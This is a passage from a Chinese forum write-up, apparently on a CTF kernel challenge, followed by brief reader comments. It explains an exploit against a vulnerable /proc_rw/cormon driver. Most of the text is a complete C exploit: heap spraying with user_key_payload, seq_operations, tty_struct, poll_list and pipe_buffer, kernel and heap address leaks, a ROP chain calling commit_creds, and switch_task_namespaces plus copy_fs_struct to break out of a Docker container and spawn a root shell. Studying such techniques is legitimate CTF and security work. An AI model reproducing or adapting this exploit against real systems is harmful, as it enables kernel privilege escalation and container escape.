    for(int i = SEQ_SPRAY_NR; i < SEQ_SPRAY_NR + 128; i++){
        seq_id[i] = alloc_seq_op();
        if(seq_id[i] < 0){
            error_log("Allocate the seq_operations failed");
        }
    }

红色堆块是我们堆喷之后 user_key_payload和 seq_operations同时指向的堆块，此时我们依次读取所有的 user_key_payload，如果读取内容大于最开始分配的8字节则说明找到了该victim，这里又知道 seq_operations结构体偏移0x18处初始化应该为 proc_single_show，他是一个内核全局函数，因此我们可以借此泄露出内核的基地址:)

但是光泄露出基地址还远远不够，我们仍需要内核堆上的地址才能进行完整的利用,要泄露堆地址我们可以通过 tty_struct结构体来进行，这里存在一个技巧，那就是创建 struct tty_struct的时候会额外创建一个32字节大小的结构体 tty_file_private

struct tty_file_private {
        struct tty_struct *tty;
        struct file *file;
        struct list_head list;
};

其中第一个字段指向与自身绑定的tty_struct，因此我们可以利用这一点来进行溢出

此时我们释放除了 victim user_key_payload以外的所有 user_key_payload,然后堆喷 struct tty_struct 这样就会变成以下情况

这样我们再次读取 victim user_key_payload就会造成堆地址泄露，且这个堆地址是某个 tty_struct

for(int i = 0; i < USER_KEY_PAYLOAD_SPRAY_NR; i++){
        if(i == victim_key_idx) continue;
        key_revoke(key_id[i]);
        key_unlink(key_id[i]);
    }
    sleep(1);
    for(int i = 0; i < TTY_SPRAY_NR; i++){
        ptmx_id[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);
        if(ptmx_id[i] < 0){
            error_log("Alloc the ptmx failed...");
        }
    }
    if(key_read(key_id[victim_key_idx], data, 0x1000) < 0){
        error_log("read victim key failed");
    }    
    if(leak_heap_addr(data) < 0){
        error_log("leak heap base failed");
    }

4.劫持执行流

我们本次选择 pipe_buffer来作为我们的目标，我们现在手上还存在着的一个 victim user_key_payload.这里我们释放所有的 seq_operations，其中也释放掉了 victim user_key_payload，这样以来就又制造出来一个UAF漏洞，然后再堆喷 32字节大小的 poll_list，就会造成以下结果

这里注意仍会有一个 poll_list也指向我们的 victim user_key_payload

        info_log("Step IX: Hijack the control stream...");
    puts("Free the part2 seq_operations...");
    for(int i = SEQ_SPRAY_NR; i < SEQ_SPRAY_NR + 128; i++){
        close(seq_id[i]);
    }
    puts("Allocate 32 size poll_list...");
    /* these up will free twice the victim user_key_payload */
    bind_core(1);
    for(int i = 0; i < 192; i++){
        create_poll_thread(i, 32, 4000, 1);
    }
    bind_core(0);
    while(poll_threads != 192){};
    sleep(1);

然后我们在这里释放掉我们的 victim user_key_payload，这样就会造成一个 poll_list存在UAF，然后我们此时的目的是修改这个 poll_list的next指针，使得时钟到的时候能够自动释放该指针指向的堆块，这里我们将其中的next指针修改为我们之前泄露的某个 tty_struct的地址-0x18，这里减去0x18是为了不让我们之后分配到的 user_key_payload头部的0x18字节影响到，如下：

puts("Free victim user_key_payload to construct poll_list uaf...");
    key_revoke(key_id[victim_key_idx]);
    key_unlink(key_id[victim_key_idx]);
    ((size_t *)data)[0] = page_offset_base - 0x18;
    sleep(1); 
    puts("Allocate setxattr and user_key_payload...");
    for(int i = 0; i < USER_KEY_PAYLOAD_SPRAY_NR; i++){
        setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
        sprintf(description, "payload_%d", i);
        memset(buff, i, sizeof(buff));
        key_id[i] = key_alloc(description, buff, 0x8);
        if(key_id[i] < 0){
            printf("[X]key index %d id is %d\n", i,key_id[i]);
            error_log("key alloc failed!");
        }
    }

可以看到其中浅灰色的部分就是我们想要达到的效果，这里想要达成修改同之前清洗一样，使用 setxattr的手段对每个分配到的kmalloc-32进行清洗，此时就是变成写 target-0x18，为了避免之后这里的值被修改，因此紧接着再次分配 32字节大小的 user_key_payload进行占位，情况如下：

截至目前，红色快部分的 poll_list的头八字节已经被成功固定为 target-0x18

此时我们立刻释放所有的 tty_struct，然后堆喷0x400大小的 pipe_buffer，构造如下效果：

 puts("Free all the tty and alloc pipe_buffer...");
    for(int i = 0; i < TTY_SPRAY_NR; i++){
        close(ptmx_id[i]);
    }
    sleep(1);
    for(int i = 0; i < 0x400; i++){
        alloc_pipe_buffer(i);
    }

然后我们等待 poll_list计时器到达然后进行释放，这里就会释放掉我们 target-0x18开头的虚假 1k object，然后我们此时堆喷1k大小的 user_key_payload就可以写入pipe_buffer了，此时我们可以修改他的ops函数数组来进行ROP

这样最后找到合适的gadget即可进行提权

5.容器逃逸

这里虽然说我们已经可以进行提权，但是还完全不够，因为提升的权限仅仅是我们docker容器的root权限，并不是我们真正的root，因此这里需要我们进行下一步操作

我们在容器中可以通过内核函数 find_task_by_vpid来寻找task_struct，这里我们可以首先在容器内部完成提权，然后使用函数 find_task_by_vpid(1)来获得容器中的init/swap进程的 task_struct，

容器中的逃逸并不像vm那样存在hypervisor，这里我们只需要进行命名空间的切换即可，而常用的切换命名空间的系统调用例如 unshare、setns都被seccomp禁用，因此我们利用一个替换者那就是 switch_task_namespaces()

我们将当前命名空间下的init进程的命名空间切换为内核当中的 init_proxy，这里是由内核当中提取的，并不是docker当中的 init_proxy，总结下来就是调用下面的函数

switch_task_namespaces(task, init_proxy);

但是上面的部分还不足成功逃逸，

由于setns被过滤，这导致我们无法在返回用户空间后进入其他的命名空间，因此我们需要模拟 setns()函数中的 commit_nsset()功能，我们利用函数 copy_fs_struct 获取内核当中的 init_fs所对应的 fs_struct结构体，然后赋值给我们当前进程的 task_struct->fs，这样就实现了资源的转移，也就是说调用下面的函数

find_task_by_vpid(getpid())->fs = copy_fs_struct(init_fs);

最终exp如下：

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>             
#include <fcntl.h>             
#include <signal.h>            
#include <poll.h>              
#include <string.h>            
#include <sys/mman.h>          
#include <syscall.h>       
#include <poll.h>      
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <sys/xattr.h>
#include <sys/stat.h>

#define USER_KEY_PAYLOAD_SPRAY_NR 199
#define SEQ_SPRAY_NR 256
#define TTY_SPRAY_NR 72
#define KEY_SPEC_PROCESS_KEYRING        -2        /* - key ID for process-specific keyring */

/* keyctl commands */
#define KEYCTL_UPDATE                        2        /* update a key */
#define KEYCTL_REVOKE                        3        /* revoke a key */
#define KEYCTL_UNLINK                        9        /* unlink a key from a keyring */
#define KEYCTL_READ                        11        /* read a key or keyring's contents */
#define KERNEL_MASK 0xffffffff00000000
#define HEAP_MASK 0xffff000000000000
#define VMMAP_MASK 0xffffe00000000000

#define N_STACK_PPS 240
#define POLL_LIST_SIZE 16
#define POLLFD_SIZE 8;
#define PAGE_SIZE 4096
#define SINGLE_START 0xffffffff812d0e30
#define PROC_SINGLE_SHOW 0xffffffff81323390
#define PREPARE_KERNEL_CRED 0xffffffff810e8e70
#define COMMIT_CREDS 0xffffffff810e8bf0
#define PUSH_RSI_JMP_RSI_39 0xffffffff815986b6
#define POP_RSP_RET 0xffffffff81000755
#define ADD_RSP_50_RET 0xffffffff8115c0a1
#define POP_RDI_RET 0xffffffff81001cb9
#define POP_RSI_RET 0xffffffff810033a5
#define MOV_RDI_RAX_RET 0xffffffff81029a73
#define SWAPGS_RESTORE_AND_RETURN_TO_USERMDOE 0xffffffff81c00f06
#define FIND_TASK_BY_VPID 0xffffffff810e20f0
#define INIT_NSPROXY 0xffffffff8245a760
#define INIT_FS 0xffffffff82589780
#define SWITCH_TASK_NAMESPACES 0xffffffff810e7300
#define COPY_FS_STRUCT 0xffffffff812e45f0
#define MOV_RCX_RAX 0xffffffff814e97e4
#define ADD_RAX_R8 0xffffffff81565011
#define POP_R8 0xffffffff811e23b1
#define MOV_RAX_RCX 0xffffffff81039dda
#define POP_RCX_RET 0xffffffff8101f89c
#define PUSH_RCX_POP_RBX 0xffffffff8142c457
#define MOV_RAX_RBX_POP_4 0xffffffff817a6b69
#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:0x%lx\n", str, x)
void info_log(char* str){
         printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
  printf("\033[0m\033[1;31m[x]%s\033[0m\n",str);
  exit(1);
}

size_t user_cs, user_ss,user_rflags,user_sp;

//int fd = 0;        // file pointer of process 'core'

void saveStatus(){
  __asm__("mov user_cs, cs;"
          "mov user_ss, ss;"
          "mov user_sp, rsp;"
          "pushf;"
          "pop user_rflags;"
          );
  puts("\033[34m\033[1m[+]Status has been saved . \033[0m");
}

void get_root(){
    if(!getuid()){
        info_log("Congratulation! We Win!!!");
        system("/bin/bash");
    }
    error_log("get root failed!");
}

void debug(){
    info_log("Debugging here!");
    getchar();
}

pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
pthread_t poll_tid[0x1000];
int fds[0x100];  //monitor target fd
int poll_threads;
size_t kernel_offset;
size_t kernel_base;
size_t page_offset_base;
int key_id[0x1000];
int seq_id[SEQ_SPRAY_NR + 128];
int ptmx_id[TTY_SPRAY_NR];
int pipe_id[0x400][2];

struct poll_args{
    int t_id;           //thread_id
    int size;           //the size you want to allocated
    int timeout;
    int hang;
};

/* to run the exp on the specific core only */
void bind_core(int core)
{
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if(sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0){
        error_log("bind core failed..");
    }
}

void bind_thread_core(int core){
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if(pthread_setaffinity_np(pthread_self(), sizeof(cpu_set), &cpu_set) < 0){
        error_log("bind core failed...");
    }
}

void *alloc_poll_list(void *args){

    struct pollfd *pfds;
    int id, want_size, timeout, nfds, hang;
    id = ((struct poll_args *)args)->t_id;
    want_size = ((struct poll_args *)args)->size;
    timeout = ((struct poll_args *)args)->timeout;
    hang = ((struct poll_args *)args)->hang;

    /* nfds need modify :) */
    want_size = want_size - ((want_size/PAGE_SIZE)+1)*POLL_LIST_SIZE;
    nfds = (N_STACK_PPS + want_size)/POLLFD_SIZE;

    pfds = calloc(nfds, sizeof(struct pollfd));
    for(int i = 0; i < nfds; i++){
        pfds[i].fd = fds[0];
        pfds[i].events = POLLERR;
    }
    bind_thread_core(0);
    pthread_mutex_lock(&mutex);
    poll_threads++;
    pthread_mutex_unlock(&mutex);
    poll(pfds, nfds, timeout);
    bind_thread_core(1);

    if(hang){
        pthread_mutex_lock(&mutex);
        poll_threads--;
        pthread_mutex_unlock(&mutex);
        while(1){}
    }
    return NULL;
}

void create_poll_thread(int id, size_t size, int timeout, int hang){
    int judge;
    struct poll_args *args;
    if(id < 0 || size < 0 || timeout < 0){
        printf("[x]create_poll_thread: Wrong argument!");
        exit(1);
    }

    /* Include the poll_list head */
    if(!(size%PAGE_SIZE == 0 || size%PAGE_SIZE > 0x10)){
        printf("[x]create_poll_thread: size you want have to be suitable!\n");
        exit(1);
    }
    args = calloc(1, sizeof(struct poll_args));
    if(args == NULL){
        error_log("Calloc faield!");
    }
    args->t_id = id;
    args->size = size;
    args->timeout = timeout;
    args->hang = hang;

    if(pthread_create(&poll_tid[id], NULL, alloc_poll_list, args) != 0){
        perror("pthread created failed");
        exit(1);
    }
}
void join_poll_threads(){
    for(int i = 0; i < poll_threads; i++ ){
        pthread_join(poll_tid[i], NULL);
    }
    poll_threads = 0;
}

/*
 * User_key_payload 
 *
 * */
int key_alloc(char* description, void* payload, size_t plen){
        return syscall(__NR_add_key, "user", description, payload, plen, KEY_SPEC_PROCESS_KEYRING);
}
int key_update(int id, void* payload, size_t plen){
  return syscall(__NR_keyctl, KEYCTL_UPDATE, id, payload, plen, NULL);
}
int key_revoke(int id){
  return syscall(__NR_keyctl, KEYCTL_REVOKE, id, NULL, NULL, NULL);
}
int key_read(int id, void* payload, size_t plen){
  return syscall(__NR_keyctl, KEYCTL_READ, id, payload, plen, NULL);
}
int key_unlink(int id){                                                                             
  return syscall(__NR_keyctl, KEYCTL_UNLINK, id, KEY_SPEC_PROCESS_KEYRING, NULL, NULL);
}

/*
 * seq_operations alloc
 * */
int alloc_seq_op(){
    return open("/proc/self/stat", O_RDONLY);
}

void init_fds(){
    fds[0] = open("/etc/passwd", O_RDONLY);
    if(fds[0] < 0){
        error_log("open /etc/passwd failed");
    }
}

int leak_kernel_addr(char *buff){
    int idx = 0; 
    while(1){
        if(((size_t *)buff)[idx] >= PROC_SINGLE_SHOW ){
            kernel_offset = ((size_t *)buff)[idx] - PROC_SINGLE_SHOW;
            kernel_base = kernel_offset + 0xffffffff81000000;
            return 1; 
        }
        idx++;
    }
    return -1;
}

int leak_heap_addr(char *buff){
    int idx = 0; 
    size_t tmp_addr;
    while(1){
        tmp_addr = ((size_t *)buff)[idx];
        if(((tmp_addr & HEAP_MASK) == HEAP_MASK)&&((tmp_addr & KERNEL_MASK) != KERNEL_MASK)&&((tmp_addr & VMMAP_MASK) != VMMAP_MASK)){
            page_offset_base = ((size_t *)buff)[idx];
            return 1; 
        }
        idx++;
    }
    return -1;

}

int alloc_pipe_buffer(int i){
    if(pipe(pipe_id[i]) < 0){
        error_log("Alloc pipe buffer failed");
    }
    if(write(pipe_id[i][1], "XXXXX", 5) < 0){
        error_log("write to pipe buffer failed");
    }
}

void main(){
    char description[0x100] = {0};
    char data[0x1000] = {0};
    char buff[0x600] = {0};
    int proc_fd;
    int victim_key_idx = -1;
    size_t fake_ops;
    size_t *magic_rop;

    init_fds();
    proc_fd = open("/proc_rw/cormon", O_RDWR); 

    info_log("Step I: Bind the core_0 and Save Status");
    bind_core(0);        
    saveStatus();

    info_log("Step II: Spraying the 0x20 seq_operations for cleaning the slab...");
    for(int i = 0; i < SEQ_SPRAY_NR; i++){
        seq_id[i] = alloc_seq_op();
        if(seq_id[i] < 0){
            error_log("Allocate the seq_operations failed");
        }
    }

    info_log("Step III: Spraying part of the 0x20 user_key_payload...");

    for(int i = 0; i < 72; i++){
        setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
        sprintf(description, "payload_%d", i);
        memset(buff, i, sizeof(buff));
        key_id[i] = key_alloc(description, buff, 0x8);
        if(key_id[i] < 0){
            printf("[X]key index %d id is %d\n", i,key_id[i]);
            error_log("key alloc failed!");
        }
    } 

    info_log("Step IV: Spraying the poll_list in type 4096+32...");
    bind_core(1);
    for(int i = 0; i < 14; i++){
        create_poll_thread(i, 4096+32, 3000, 0);
    }
    bind_core(0);
    while(poll_threads != 14){};

    sleep(1);
    info_log("Step V: Spraying remain of the 0x20 user_key_payload...");
    for(int i = 72; i < USER_KEY_PAYLOAD_SPRAY_NR; i++){
        setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
        sprintf(description, "payload_%d", i);
        memset(buff, i, sizeof(buff));
        key_id[i] = key_alloc(description, buff, 0x8);
        if(key_id[i] < 0){
            printf("[X]key index %d id is %d\n", i,key_id[i]);
            error_log("key alloc failed!");
        }
    }  

    info_log("Step VI: Insert the proc_rw/cormons's 4096 object and free random one user_key_payload..");
    write(proc_fd, data, 4096); 
    join_poll_threads();

    info_log("Step VII: Construct UAF by seq_operations...");
    for(int i = SEQ_SPRAY_NR; i < SEQ_SPRAY_NR + 128; i++){
        seq_id[i] = alloc_seq_op();
        if(seq_id[i] < 0){
            error_log("Allocate the seq_operations failed");
        }
    }

    info_log("Step VIII: OOB read for leaking the kernel address...");
    for(int i = 0; i < USER_KEY_PAYLOAD_SPRAY_NR; i++){
        if(key_read(key_id[i], data, 0x1000) > 0x10){
            victim_key_idx = i;
            break;
        }
    }
    if(victim_key_idx == -1){
        error_log("Unfortunatly!We do not found the victim key..");
    }else{
        printf("The victim key idx we found is %d\n", victim_key_idx);
    }
    if(leak_kernel_addr(data) < 0){
        error_log("Leaking kernel base failed");
    }
    printf("[+]Congratualation!You find the kernel offset : 0x%lx\n", kernel_offset);
    puts("Free the user_key_payloads, except the corrupted user_key_payload");
    for(int i = 0; i < USER_KEY_PAYLOAD_SPRAY_NR; i++){
        if(i == victim_key_idx) continue;
        key_revoke(key_id[i]);
        key_unlink(key_id[i]);
    }
    sleep(1);
    for(int i = 0; i < TTY_SPRAY_NR; i++){
        ptmx_id[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);
        if(ptmx_id[i] < 0){
            error_log("Alloc the ptmx failed...");
        }
    }
    if(key_read(key_id[victim_key_idx], data, 0x1000) < 0){
        error_log("read victim key failed");
    }    
    if(leak_heap_addr(data) < 0){
        error_log("leak heap base failed");
    }
    printf("[+]We found the kmalloc-1024 slab addr: 0x%lx\n", page_offset_base);
    info_log("Up to now, We found those address :)");
    PRINT_ADDR("Kernel base addr", kernel_base);
    PRINT_ADDR("Kernel offset", kernel_offset);
    PRINT_ADDR("Kernel 1024 kmalloc", page_offset_base);
    info_log("Step IX: Hijack the control stream...");
    puts("Free the part2 seq_operations...");
    for(int i = SEQ_SPRAY_NR; i < SEQ_SPRAY_NR + 128; i++){
        close(seq_id[i]);
    }
    puts("Allocate 32 size poll_list...");
    /* these up will free twice the victim user_key_payload */
    bind_core(1);
    for(int i = 0; i < 192; i++){
        create_poll_thread(i, 32, 4000, 1);
    } 
    while(poll_threads != 192){};
    usleep(250000);
    bind_core(0);
    /* these up will alloc twice the victim user_key_payload */
    puts("Free victim user_key_payload to construct poll_list uaf...");
    key_revoke(key_id[victim_key_idx]);
    key_unlink(key_id[victim_key_idx]);
    ((size_t *)data)[0] = page_offset_base - 0x18;
    sleep(1); 
    puts("Allocate setxattr and user_key_payload...");
    for(int i = 0; i < USER_KEY_PAYLOAD_SPRAY_NR; i++){
        setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
        sprintf(description, "payload_%d", i);
        memset(buff, i, sizeof(buff));
        key_id[i] = key_alloc(description, buff, 0x8);
        if(key_id[i] < 0){
            printf("[X]key index %d id is %d\n", i,key_id[i]);
            error_log("key alloc failed!");
        }
    } 
    puts("Free all the tty and alloc pipe_buffer...");
    for(int i = 0; i < TTY_SPRAY_NR; i++){
        close(ptmx_id[i]);
    }
    sleep(1);
    for(int i = 0; i < 0x400; i++){
        alloc_pipe_buffer(i);
    }
    while(poll_threads != 0){};
    sleep(1);
    puts("[+]down!");
    info_log("Step X: Construct our magic ROP :^)");
    memset(data, 0x41, sizeof(data));
    fake_ops = page_offset_base + 0x18;   
    *(size_t *)&(data[0]) = ADD_RSP_50_RET + kernel_offset;
    *(size_t *)&(data[0x10]) = fake_ops;
    *(size_t *)&(data[0x20]) = PUSH_RSI_JMP_RSI_39 + kernel_offset;
    *(size_t *)&(data[0x39]) = POP_RSP_RET + kernel_offset;

    /* ROP */
    size_t index = 0;
    magic_rop = (size_t *)&(data[0x58]);
    magic_rop[index++] = POP_RDI_RET + kernel_offset;
    magic_rop[index++] = 0;
    magic_rop[index++] = PREPARE_KERNEL_CRED + kernel_offset;
    magic_rop[index++] = MOV_RDI_RAX_RET + kernel_offset;
    magic_rop[index++] = COMMIT_CREDS + kernel_offset;

    /* switch_task_namespaces(find_task_by_vpid(1), init_nsproxy) */
    magic_rop[index++] = POP_RDI_RET + kernel_offset;
    magic_rop[index++] = 1;
    magic_rop[index++] = FIND_TASK_BY_VPID + kernel_offset;
    magic_rop[index++] = POP_RCX_RET + kernel_offset;
    magic_rop[index++] = 0x1000;
    magic_rop[index++] = MOV_RDI_RAX_RET + kernel_offset;
    magic_rop[index++] = POP_RSI_RET + kernel_offset;
    magic_rop[index++] = INIT_NSPROXY + kernel_offset;
    magic_rop[index++] = SWITCH_TASK_NAMESPACES + kernel_offset;

    /* new_fs = copy_fs_struct(init_fs) */
    magic_rop[index++] = POP_RDI_RET + kernel_offset;
    magic_rop[index++] = INIT_FS + kernel_offset;
    magic_rop[index++] = COPY_FS_STRUCT + kernel_offset;
    magic_rop[index++] = MOV_RCX_RAX + kernel_offset;
    magic_rop[index++] = PUSH_RCX_POP_RBX + kernel_offset;

    /* find_task_by_vpid(getpid())->fs = new_fs */
    magic_rop[index++] = POP_RDI_RET + kernel_offset;
    magic_rop[index++] = getpid();
    magic_rop[index++] = FIND_TASK_BY_VPID + kernel_offset;
    magic_rop[index++] = POP_R8 + kernel_offset;
    magic_rop[index++] = 0x6e0;
    magic_rop[index++] = ADD_RAX_R8 + kernel_offset;
    magic_rop[index++] = MOV_RAX_RBX_POP_4 + kernel_offset;
    magic_rop[index++] = 0xdeadbeef;
    magic_rop[index++] = 0xdeadbeef;
    magic_rop[index++] = 0xdeadbeef;
    magic_rop[index++] = 0xdeadbeef;

    magic_rop[index++] = SWAPGS_RESTORE_AND_RETURN_TO_USERMDOE + kernel_offset;
    magic_rop[index++] = 0xdeadbeef;
    magic_rop[index++] = 0xdeadbeef;
    magic_rop[index++] = (size_t)get_root;   
    magic_rop[index++] = user_cs;   
    magic_rop[index++] = user_rflags;   
    magic_rop[index++] = user_sp + 8;   
    magic_rop[index++] = user_ss;   

    puts("[+]Done!");
    sleep(1);
    for(int i = 0; i < 30; i++){
        sprintf(description, "payload_%d", i);
        key_id[i] = key_alloc(description, data, 0x200);
        if(key_id[i] < 0){
            printf("[X]key_%d alloc failed!", i);
            error_log("key_alloc failed");
        }
    }
    puts("Release the whole pipe_buffer...");
    for(int i = 0; i < 0x400; i++){
        close(pipe_id[i][1]);
        close(pipe_id[i][0]);
    }
 }

其中有个很大的问题就是经常内核panic会报这两种错误

初步分析是poll在最后时间到返回的时候报错，没调出来:(

JuncoJet · 发表于 2023-10-27 11:50

plutos77 · 发表于 2023-10-27 20:14

学习一下

winxpnt · 发表于 2023-10-28 08:13

感谢分享，学习

ideapad · 发表于 2023-10-28 19:20